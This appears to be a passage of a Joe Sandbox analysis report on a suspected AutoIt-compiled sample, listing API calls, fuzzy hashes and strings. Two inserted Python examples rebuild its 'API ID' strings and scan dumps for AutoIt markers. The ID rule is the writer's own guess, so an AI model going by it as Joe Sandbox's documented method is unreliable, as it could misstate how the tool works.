                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction ID: dae6609a801792cf7797df7ade5582011e272c0182ec75830cc413020c350e1f
                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction Fuzzy Hash: 41C183322051A30AEF7D463D943413EBBE1ABA37B171A176DE4B2DB9D4EF20D5249620
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction ID: 9727c2afce1d6d529aee864f0d83bc5ee6bdf98cf9cf1598771c967f814fb71c
                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction Fuzzy Hash: ADC163362051A30DEF6D4639947813EBAE1FBA37B171A076DE4B2CB9D4EF20D524D610
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction ID: b713fad75549fa1e8069edc61df6594151fa05d007bf17d7c2ae05d1b14e87bf
                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction Fuzzy Hash: 8741C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction ID: 6e6d3a947819157dec47a8b4de5df305d675393d2adc78a7aadc565ce36cdee1
                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction Fuzzy Hash: 4B01D278E10109EFCB49DF98C5809AEF7B5FB48310F208599D819A7341D731AE41DB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction ID: e1a5115747071acc29f358b139b8ac0ef536c9f6e20f07f63f09af1fc7ee5ffe
                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction Fuzzy Hash: A501DD78E10209EFCB49DF98C5809AEFBB5FB48310F208199E819A7341E771AE41DB80
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 008F7B70
                              • DeleteObject.GDI32(00000000), ref: 008F7B82
                              • DestroyWindow.USER32 ref: 008F7B90
                              • GetDesktopWindow.USER32 ref: 008F7BAA
                              • GetWindowRect.USER32(00000000), ref: 008F7BB1
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008F7CF2
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008F7D02
                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7D4A
                              • GetClientRect.USER32(00000000,?), ref: 008F7D56
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008F7D90
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DB2
                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DC5
                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DD0
                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DD9
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DE8
                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DF1
                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DF8
                              • GlobalFree.KERNEL32(00000000), ref: 008F7E03
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7E15
                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00912CAC,00000000), ref: 008F7E2B
                              • GlobalFree.KERNEL32(00000000), ref: 008F7E3B
                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008F7E61
                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008F7E80
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7EA2
                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F808F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 2211948467-2373415609
                              • Opcode ID: 26d114f4a12055a0b56b79e2dca5a62fd377257e3591b35fc3e5e0efbf77fe12
                              • Instruction ID: 0a0935243023fb6958aa717b660afbff5988e9ac21aaf551d1bb48ee065e1cd0
                              • Opcode Fuzzy Hash: 26d114f4a12055a0b56b79e2dca5a62fd377257e3591b35fc3e5e0efbf77fe12
                              • Instruction Fuzzy Hash: 5B027C71914109EFDB14DF68CC99EAE7BB9FB49310F148168F915EB2A1CB70AD01DB60
                              APIs
                              • CharUpperBuffW.USER32(?,?,0090F910), ref: 009038AF
                              • IsWindowVisible.USER32(?), ref: 009038D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpperVisibleWindow
                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                              • API String ID: 4105515805-45149045
                              • Opcode ID: 4812d920d4e9e4c52116684a148fb87140f61940626bf33e94e5de39dff78d51
                              • Instruction ID: 94e720b53f5320b69bc93fb839a2cba08ad8652b34f548e9a786a0cc9b2fad1d
                              • Opcode Fuzzy Hash: 4812d920d4e9e4c52116684a148fb87140f61940626bf33e94e5de39dff78d51
                              • Instruction Fuzzy Hash: 80D17C30204315DFCB24EF18C495A6A77A9FF95344F148959F8C69B7E2CB25EE0ACB42
                              APIs
                              • SetTextColor.GDI32(?,00000000), ref: 0090A89F
                              • GetSysColorBrush.USER32(0000000F), ref: 0090A8D0
                              • GetSysColor.USER32(0000000F), ref: 0090A8DC
                              • SetBkColor.GDI32(?,000000FF), ref: 0090A8F6
                              • SelectObject.GDI32(?,?), ref: 0090A905
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A930
                              • GetSysColor.USER32(00000010), ref: 0090A938
                              • CreateSolidBrush.GDI32(00000000), ref: 0090A93F
                              • FrameRect.USER32(?,?,00000000), ref: 0090A94E
                              • DeleteObject.GDI32(00000000), ref: 0090A955
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A9A0
                              • FillRect.USER32(?,?,?), ref: 0090A9D2
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090A9FD
                                • Part of subcall function 0090AB60: GetSysColor.USER32(00000012), ref: 0090AB99
                                • Part of subcall function 0090AB60: SetTextColor.GDI32(?,?), ref: 0090AB9D
                                • Part of subcall function 0090AB60: GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                • Part of subcall function 0090AB60: GetSysColor.USER32(0000000F), ref: 0090ABBE
                                • Part of subcall function 0090AB60: GetSysColor.USER32(00000011), ref: 0090ABDB
                                • Part of subcall function 0090AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                • Part of subcall function 0090AB60: SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                • Part of subcall function 0090AB60: SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                • Part of subcall function 0090AB60: SelectObject.GDI32(?,?), ref: 0090AC10
                                • Part of subcall function 0090AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                • Part of subcall function 0090AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                • Part of subcall function 0090AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                              • String ID:
                              • API String ID: 4124339563-0
                              • Opcode ID: 4d0e7e004eadc7b690be5b3974175031173f80bb9a639a60b93a3a62a9cbd7f5
                              • Instruction ID: c996092c723037b3dc574acaf8a655a9678b27f0c02ca595663e6c206cb32e44
                              • Opcode Fuzzy Hash: 4d0e7e004eadc7b690be5b3974175031173f80bb9a639a60b93a3a62a9cbd7f5
                              • Instruction Fuzzy Hash: 74A1AE7211C301EFDB209F64DC08E6B7BA9FF89321F104A29F962961E0D735DA44DB92
                              APIs
                              • DestroyWindow.USER32(?,?,?), ref: 00882CA2
                              • DeleteObject.GDI32(00000000), ref: 00882CE8
                              • DeleteObject.GDI32(00000000), ref: 00882CF3
                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00882CFE
                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00882D09
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC68B
                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008BC6C4
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BCAED
                                • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                              • SendMessageW.USER32(?,00001053), ref: 008BCB2A
                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BCB41
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB57
                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB62
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                              • String ID: 0
                              • API String ID: 464785882-4108050209
                              • Opcode ID: 1852af9e80f668846ca687dc8d73af92ee20914f439d55278ddf8d62829dc71f
                              • Instruction ID: 6a55959ed9f830acb15a4fe41b90247174fac8b3b47dbaa6cf021b07b75591aa
                              • Opcode Fuzzy Hash: 1852af9e80f668846ca687dc8d73af92ee20914f439d55278ddf8d62829dc71f
                              • Instruction Fuzzy Hash: AD12AC70604205EFDB20DF28C984BA9BBE2FF05314F5445B9F896DB662CB31E842DB91
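How the "API ID" line of each block is derived from its "APIs" list, as an added example. This is my reconstruction, not Joe Sandbox's own code: the rule (camel-case tokens, tokens of three characters or fewer dropped, subcall lines counted, most frequent token first, ties alphabetical, frequency groups joined with `$`) is an assumption inferred from the IDs printed on this page, and the sample input is the "APIs" list of the ImageList_Destroy function directly above with its argument lists shortened. The numeric "API String ID" is not reproduced here.

```python
"""Reconstruct a Joe Sandbox 'API ID' from a function's 'APIs' list.

Added example, not Joe Sandbox code.  The rule implemented here is an
assumption that reproduces the IDs printed on this report page: split each
API name into camel-case tokens, drop tokens of three characters or fewer
(Get, Set, Is, Ex, W, Sys, Ole, ...), count tokens over every listed call
including 'Part of subcall function' lines, order by frequency and then
alphabetically, and join the frequency groups with '$'.
"""
import re
from collections import Counter

# Constructed sample: the 'APIs' lines of the ImageList_Destroy function
# on this page, argument lists shortened (one call per line).
SAMPLE_APIS = """\
• DestroyWindow.USER32(?,?,?), ref: 00882CA2
• DeleteObject.GDI32(00000000), ref: 00882CE8
• DeleteObject.GDI32(00000000), ref: 00882CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00882CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00882D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC68B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008BC6C4
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BCAED
  • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00881B9A
• SendMessageW.USER32(?,00001053), ref: 008BCB2A
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BCB41
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB57
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 008BCB62
"""

# 'Name.MODULE(' or 'Name.MODULE ref:' (the latter is how CRT calls such as
# _memset.LIBCMT are printed, without an argument list).
API_CALL = re.compile(r'([A-Za-z_][A-Za-z0-9_]*)\.[A-Z][A-Z0-9]*(?:\(|\s+ref:)')
MIN_TOKEN_LEN = 4   # assumption: shorter tokens are discarded


def api_names(block: str) -> list[str]:
    """Extract the API names from report lines, subcall lines included."""
    names = []
    for line in block.splitlines():
        m = API_CALL.search(line)
        if m:
            names.append(m.group(1))
    return names


def tokenize(name: str) -> list[str]:
    """Split one API name into the tokens the ID is built from."""
    tokens = []
    # Pieces carrying an underscore stay whole: 'ImageList_Remove' gives
    # 'ImageList_' and 'Remove'; '_memset' and '__wcsnicmp' stay as they are.
    # Every other piece is split at upper-case boundaries.
    for piece in re.findall(r'_*[^_]+_*', name):
        if '_' in piece:
            tokens.append(piece)
        else:
            tokens.extend(re.findall(r'[A-Z][a-z]*|[a-z]+', piece))
    return [t for t in tokens if len(t) >= MIN_TOKEN_LEN]


def api_id(names) -> str:
    """Most frequent tokens first; ties alphabetical; groups joined by '$'."""
    counts = Counter(t for n in names for t in tokenize(n))
    by_count = {}
    for token, c in counts.items():
        by_count.setdefault(c, []).append(token)
    return '$'.join(''.join(sorted(by_count[c]))
                    for c in sorted(by_count, reverse=True))


if __name__ == '__main__':
    print(api_id(api_names(SAMPLE_APIS)))
```

Because the tokens are order-independent and ignore arguments, two functions from different builds of the same runtime produce the same API ID, which is what the "Similarity" section keys on; the two-call function CharUpperBuffW/IsWindowVisible above yields `BuffCharUpperVisibleWindow` under the same rule.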
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 008F77F1
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F78B0
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F78EE
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F7900
                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7946
                              • GetClientRect.USER32(00000000,?), ref: 008F7952
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7996
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F79A5
                              • GetStockObject.GDI32(00000011), ref: 008F79B5
                              • SelectObject.GDI32(00000000,00000000), ref: 008F79B9
                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008F79C9
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F79D2
                              • DeleteDC.GDI32(00000000), ref: 008F79DB
                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F7A07
                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F7A1E
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7A59
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F7A6D
                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F7A7E
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F7AAE
                              • GetStockObject.GDI32(00000011), ref: 008F7AB9
                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F7AC4
                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008F7ACE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: dd336d9c5d5bb04dc66ffdd7c8bbc9eab3c1b5c3cd912df9edd68efa83d5ee62
                              • Instruction ID: a9d56edcc0130b3b86231aa5572c322baf9e53d0eff25485d32c787663e28f13
                              • Opcode Fuzzy Hash: dd336d9c5d5bb04dc66ffdd7c8bbc9eab3c1b5c3cd912df9edd68efa83d5ee62
                              • Instruction Fuzzy Hash: 0FA17EB1A54209BFEB14DBA8DC4AFAA7BB9FB45710F004114FA15E72E0D7B0AD00DB65
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EAF89
                              • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EB066
                              • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EB1C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                              • API String ID: 2907320926-4222207086
                              • Opcode ID: a418c5b03f74575e970b3c9367bbc06ba763770165bba2f6221521985b673305
                              • Instruction ID: b7bec85f668f0bce819747a6608378c5a09b1f86e767d0bffd133f29151024a1
                              • Opcode Fuzzy Hash: a418c5b03f74575e970b3c9367bbc06ba763770165bba2f6221521985b673305
                              • Instruction Fuzzy Hash: AA51C230A84389EBCB14EB16C9A287E73B1FB96769B204025E44BE7290C735AD41DF43
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-86951937
                              • Opcode ID: 0401924f200ab29ac87e5d0c41c397bbef11200ba7a30291ef53affe0cf1c106
                              • Instruction ID: a3bbd80fca14e279a4fc3de3e608b1aba6a146fb290b65fdfbe311f25a2e1454
                              • Opcode Fuzzy Hash: 0401924f200ab29ac87e5d0c41c397bbef11200ba7a30291ef53affe0cf1c106
                              • Instruction Fuzzy Hash: 3F812671640625AFDB24BB68CC82FEE3768FF16704F044025F945EA5C2FB60EA61C792
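The directive strings in the block above (`#include-once`, `#requireadmin`, `#OnAutoItStartRegister` and the parser's error messages) are the AutoIt script preprocessor's vocabulary, and they are the kind of marker that backs the report's "Binary is likely a compiled AutoIt script file" verdict. The following added example (mine, not Joe Sandbox or AutoIt code) turns that "String ID" line into search needles and scans a memory dump for them. It assumes, as the `__wcsnicmp` comparison in the same function suggests, that the runtime holds these directives as UTF-16LE wide strings; it also tries the plain ASCII form so that a partly decoded dump still scores. The dump fragment it scans is constructed for the example.

```python
"""Scan a memory dump for the AutoIt directive strings listed in a
Joe Sandbox 'String ID' line.

Added example, not Joe Sandbox or AutoIt code.  Assumption: the AutoIt
runtime stores these directives as UTF-16LE wide strings (the function
compares them with __wcsnicmp); the ASCII form is searched as well.
"""
import re

# The '$'-separated String ID exactly as printed for the directive parser.
STRING_ID = ("#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include"
             "$#include-once$#notrayicon$#pragma compile$#requireadmin"
             "$Bad directive syntax error$Cannot parse #include"
             "$Unterminated group of comments")


def markers_from_string_id(string_id: str, min_len: int = 6) -> list[str]:
    """Split the report's String ID; markers as short as '#cs' are too noisy to count."""
    return [s for s in string_id.split('$') if len(s) >= min_len]


def find_markers(buf: bytes, markers) -> dict[str, list[tuple[str, int]]]:
    """Return {marker: [(encoding, offset), ...]} for every marker present in buf."""
    hits = {}
    for marker in markers:
        for enc in ('utf-16-le', 'ascii'):
            needle = marker.encode(enc)
            for match in re.finditer(re.escape(needle), buf):
                hits.setdefault(marker, []).append((enc, match.start()))
    return hits


def looks_like_autoit(buf: bytes, min_distinct: int = 3) -> bool:
    """Triage verdict: several distinct directive markers in one buffer."""
    return len(find_markers(buf, markers_from_string_id(STRING_ID))) >= min_distinct


def build_sample() -> bytes:
    """Constructed dump fragment: filler around three wide strings and one ASCII string."""
    filler = bytes(range(0x41, 0x5b)) * 2          # 52 bytes of 'A'..'Z'
    return (filler
            + '#include-once'.encode('utf-16-le') + b'\x00\x00' + filler
            + '#requireadmin'.encode('utf-16-le') + b'\x00\x00'
            + b'Bad directive syntax error\x00' + filler
            + '#notrayicon'.encode('utf-16-le') + b'\x00\x00')


if __name__ == '__main__':
    sample = build_sample()
    for marker, where in sorted(find_markers(sample, markers_from_string_id(STRING_ID)).items()):
        print(f'{marker!r}: {where}')
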